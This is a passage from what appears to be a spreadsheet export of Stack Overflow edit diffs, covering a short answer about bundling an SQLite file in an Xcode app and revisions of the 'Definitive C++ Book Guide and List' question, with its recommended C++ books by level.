 &lt;p&gt; In my app, I have a sql lite DB which I just dropped in the root of my project folder and added to the resources folder of my project, and it winds up in the bundle, accessible by the app.&lt;/p&gt; _x000D_
 &lt;a href="http://img68.imageshack.us/my.php?image=xcoderesourceslw5.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://img68.imageshack.us/my.php?image=xcoderesourceslw5.png&lt;/span&gt;&lt;/a&gt; _x000D_
 &lt;p&gt; I assume this will work for any file. I didn't have to write any special targets or operations.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In my app, I have a sql lite DB which I just dropped in the root of my project folder and added to the resources folder of my project, and it winds up in the bundle, accessible by the app.&lt;/p&gt; _x000D_
 &lt;a href="http://img68.imageshack.us/img68/3047/xcoderesourceslw5.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://img68.imageshack.us/img68/3047/xcoderesourceslw5.png&lt;/span&gt;&lt;/a&gt; _x000D_
 &lt;p&gt; I assume this will work for any file. I didn't have to write any special targets or operations.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This question attempts to collect the few pearls among the dozens of bad C++ books that are published every year.&lt;/p&gt; _x000D_
 &lt;p&gt; Unlike many other programming languages, which are often picked up on the go from tutorials found on the Internet, few are able to quickly pick up C++ without studying a well-written C++ book. It is way too big and complex for doing this. In fact, it is so big and complex, that &lt;em&gt;&lt;strong&gt;there are very many very bad C++ books&lt;/strong&gt;&lt;/em&gt; out there. And we are not talking about bad style, but things like sporting &lt;em&gt;glaringly obvious factual errors&lt;/em&gt; and &lt;em&gt;promoting abysmally bad programming styles&lt;/em&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Please&lt;span class="diff-delete"&gt; edit the accepted answer to&lt;/span&gt; provide &lt;strong&gt;quality books&lt;/strong&gt; and an approximate skill level â€” &lt;em&gt;preferably&lt;/em&gt; &lt;strong&gt;after&lt;/strong&gt; &lt;em&gt;discussing your addition in &lt;a href="http://chat.stackoverflow.com/rooms/10/loungec"&gt;the C++ chat room&lt;/a&gt;&lt;/em&gt;. (The regulars might mercilessly undo your work if they disagree with a recommendation.) Add a short blurb/description about each book that you have personally read/benefited from. Feel free to debate quality, headings, etc. Books that meet the criteria will be added to the list. Books that have reviews by the Association of C and C++ Users (ACCU) have links to the review.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;sub&gt;&lt;em&gt;Note: FAQs and other resources can be found in the &lt;a href="http://stackoverflow.com/tags/c%2b%2b/info"&gt;C++ tag info&lt;/a&gt; and under &lt;a href="/questions/tagged/c%2b%2b-faq" class="post-tag" title="show questions tagged 'c++-faq'" rel="tag"&gt;c++-faq&lt;/a&gt;. There is also a similar post for C: &lt;a href="http://stackoverflow.com/questions/562303/the-definitive-c-book-guide-and-list"&gt;The Definitive C Book Guide and List&lt;/a&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This question attempts to collect the few pearls among the dozens of bad C++ books that are published every year.&lt;/p&gt; _x000D_
 &lt;p&gt; Unlike many other programming languages, which are often picked up on the go from tutorials found on the Internet, few are able to quickly pick up C++ without studying a well-written C++ book. It is way too big and complex for doing this. In fact, it is so big and complex, that &lt;em&gt;&lt;strong&gt;there are very many very bad C++ books&lt;/strong&gt;&lt;/em&gt; out there. And we are not talking about bad style, but things like sporting &lt;em&gt;glaringly obvious factual errors&lt;/em&gt; and &lt;em&gt;promoting abysmally bad programming styles&lt;/em&gt;.&lt;span class="diff-add"&gt; And it's even worse with online tutorials. (There is a reason nobody bothered to setup a similar question for online tutorials.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Please provide &lt;strong&gt;quality books&lt;/strong&gt; and an approximate skill level â€” &lt;em&gt;preferably&lt;/em&gt; &lt;strong&gt;after&lt;/strong&gt; &lt;em&gt;discussing your addition in &lt;a href="http://chat.stackoverflow.com/rooms/10/loungec"&gt;the C++ chat room&lt;/a&gt;&lt;/em&gt;. (The regulars might mercilessly undo your work if they disagree with a recommendation.) Add a short blurb/description about each book that you have personally read/benefited from. Feel free to debate quality, headings, etc. Books that meet the criteria will be added to the list. Books that have reviews by the Association of C and C++ Users (ACCU) have links to the review.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; To spell it out bluntly: &lt;/span&gt;&lt;em&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;There is no need to add a 75th answer to this question.&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; If you feel like a book should be added, &lt;/span&gt;&lt;em&gt;&lt;a href="http://chat.stackoverflow.com/rooms/10/loungec"&gt;&lt;span class="diff-add"&gt;suggest it to the community&lt;/span&gt;&lt;/a&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; and let's discuss it.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;sub&gt;&lt;em&gt;Note: FAQs and other resources can be found in the &lt;a href="http://stackoverflow.com/tags/c%2b%2b/info"&gt;C++ tag info&lt;/a&gt; and under &lt;a href="/questions/tagged/c%2b%2b-faq" class="post-tag" title="show questions tagged 'c++-faq'" rel="tag"&gt;c++-faq&lt;/a&gt;. There is also a similar post for C: &lt;a href="http://stackoverflow.com/questions/562303/the-definitive-c-book-guide-and-list"&gt;The Definitive C Book Guide and List&lt;/a&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Reference Style - All Levels&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321958314" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;A Tour of C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Bjarne Stroustrup) The "tour" is a quick (about 180 pages and 14 chapters) tutorial overview of all of standard C++ (language and standard library, &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;and using C++11&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) at a moderately high level for people who already know C++ or at least are experienced programmers. This book is an extended version of the material that constitutes Chapters 2-5 of The C++ Programming Language, 4th edition.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201700735" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;The C++ Programming Language&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Bjarne Stroustrup) (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;updated for C++11&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) The classic introduction to C++ by its creator. Written to parallel the classic K&amp;amp;R, this indeed reads very much alike it and covers just about everything from the core language to the standard library, to programming paradigms to the language's philosophy. (Thereby making the latest editions break the 1k page barrier.) &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=620" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; The &lt;/span&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321563840" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;fourth edition&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (released on May 19, 2013) covers C++11.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321623215" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Standard Library Tutorial and Reference&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Nicolai Josuttis) (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;updated for C++11&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;The&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; introduction and reference for the C++ Standard Library. The second edition (released on April 9, 2012) covers C++11. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=1075" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201183951" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;The C++ IO Streams and Locales&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Angelika Langer and Klaus Kreft) There's very little to say about this book except that, if you want to know anything about streams and locales, then this is the one place to find definitive answers. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=200" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; C++11 References:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://webstore.ansi.org/RecordDetail.aspx?sku=INCITS%2fISO%2fIEC+14882-2012" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;The C++ Standard (INCITS/ISO/IEC 14882-2011)&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; This, of course, is the final arbiter of all that is or isn't C++. Be aware, however, that it is intended purely as a reference for &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;experienced&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; users willing to devote considerable time and effort to its understanding. As usual, the first release was &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;quite&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; expensive ($300+ US), but it has now been released in electronic form for $60US&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="http://www.artima.com/shop/overview_of_the_new_cpp" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Overview of the New C++ (C++11/14) (PDF only)&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Scott Meyers) (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;updated for C++1y/C++14&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) These are the presentation materials (slides and some lecture notes) of a three-day training course offered by Scott Meyers, who's a highly respected author on C++. Even though the list of items is short, the quality is high.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Beginner&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h3&gt;&lt;span class="diff-add"&gt;Introductory&lt;/span&gt;&lt;/h3&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If you are new to programming or if you have experience in other languages and are new to C++, these books are highly recommended.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321714113" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Primer&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; * (Stanley Lippman, JosÃ©e Lajoie, and Barbara E. Moo) (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;updated for C++11&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) Coming at 1k pages, this is a very thorough introduction into C++ that covers just about everything in the language in a very accessible format and in great detail. The fifth edition (released August 16, 2012) covers C++11. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=1848" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/020170353X" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Accelerated C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Andrew Koenig and Barbara Moo) This basically covers the same ground as the &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Primer&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;, but does so on a fourth of its space. This is largely because it does not attempt to be an introduction to &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;programming&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;, but an introduction to &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; for people who've previously programmed in some other language. It has a steeper learning curve, but, for those who can cope with this, it is a very compact introduction into the language. (Historically, it broke new ground by being the first beginner's book using a modern approach at teaching the language.) &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=1185" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0139798099" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Thinking in C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Bruce Eckel) Two volumes; second is more about standard library, but still very good&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321543726" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Programming: Principles and Practice Using C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Bjarne Stroustrup) An introduction to programming using C++ by the creator of the language. A good read, that assumes no previous programming experience, but is not only for beginners. (&lt;/span&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321992784" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;The 2nd Edition&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (&lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;updated for C++11&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;) is coming.)&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;sub&gt;&lt;span class="diff-add"&gt; * Not to be confused with [_C++ Primer Plus_](http://www.amazon.com/dp/0672326973) (Stephen Prata), with a significantly less favorable [review](http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=1744). &lt;/span&gt;&lt;/sub&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h3&gt;&lt;span class="diff-add"&gt;Best practices&lt;/span&gt;&lt;/h3&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321334876" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Effective C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Scott Meyers) This was written with the aim of being the best second book C++ programmers should read, and it succeeded. Earlier editions were aimed at programmers coming from C, the third edition changes this and targets programmers coming from languages like Java. It presents ~50 easy-to-remember rules of thumb along with their rationale in a very accessible (and enjoyable) style. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=700" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201749629" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Effective STL&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Scott Meyers) This aims to do the same to the part of the standard library coming from the STL what &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Effective C++&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; did to the language as a whole: It presents rules of thumb along with their rationale. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=67" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Intermediate&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/020163371X" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;More Effective C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Scott Meyers) Even more rules of thumb than &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Effective C++&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;. Not as important as the ones in the first book, but still good to know.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201615622" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Exceptional C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Herb Sutter) Presented as a set of puzzles, this has one of the best and thorough discussions of the proper resource management and exception safety in C++ through Resource Acquisition is Initialization (RAII) in addition to in-depth coverage of a variety of other topics including the pimpl idiom, name lookup, good class design, and the C++ memory model. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=209" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/020170434X" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;More Exceptional C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Herb Sutter) Covers additional exception safety topics not covered in &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Exceptional C++&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;, in addition to discussion of effective object oriented programming in C++ and correct use of the STL. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=784" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201760428" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Exceptional C++ Style&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Herb Sutter) Discusses generic programming, optimization, and resource management; this book also has an excellent exposition of how to write modular code in C++ by using nonmember functions and the single responsibility principle. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=107" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321113586" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Coding Standards&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Herb Sutter and Andrei Alexandrescu) "Coding standards" here doesn't mean "how many spaces should I indent my code?" This book contains 101 best practices, idioms, and common pitfalls that can help you to write correct, understandable, and efficient C++ code. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=1439" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201734842" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Templates: The Complete Guide&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (David Vandevoorde and Nicolai M. Josuttis) This is &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;the&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; book about templates as they existed before C++11. It covers everything from the very basics to some of the most advanced template metaprogramming and explains every detail of how templates work (both conceptually and at how they are implemented) and discusses many common pitfalls. Has excellent summaries of the One Definition Rule (ODR) and overload resolution in the appendices. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=506" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Advanced&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201704315" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Modern C++ Design&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Andrei Alexandrescu) A groundbreaking book on advanced generic programming techniques. Introduces policy-based design, type lists, and fundamental generic programming idioms then explains how many useful design patterns (including small object allocators, functors, factories, visitors, and multimethods) can be implemented efficiently, modularly, and cleanly using generic programming. &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=979" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321227255" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Template Metaprogramming&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (David Abrahams and Aleksey Gurtovoy)&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/1933988770" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;C++ Concurrency In Action&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Anthony Williams) A book covering C++11 concurrency support including the thread library, the atomics library, the C++ memory model, locks and mutexes, as well as issues of designing and debugging multithreaded applications.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/1460966163" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Advanced C++ Metaprogramming&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Davide Di Gennaro) A pre-C++11 manual of TMP techniques, focused more on practice than theory. There are a ton of snippets in this book, some of which are made obsolete by typetraits, but the techniques, are nonetheless, useful to know. If you can put up with the quirky formatting/editing, it is easier to read than Alexandrescu, and arguably, more rewarding. For more experienced developers, there is a good chance that you may pick up something about a dark corner of C++ (a quirk) that usually only comes about through extensive experience.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
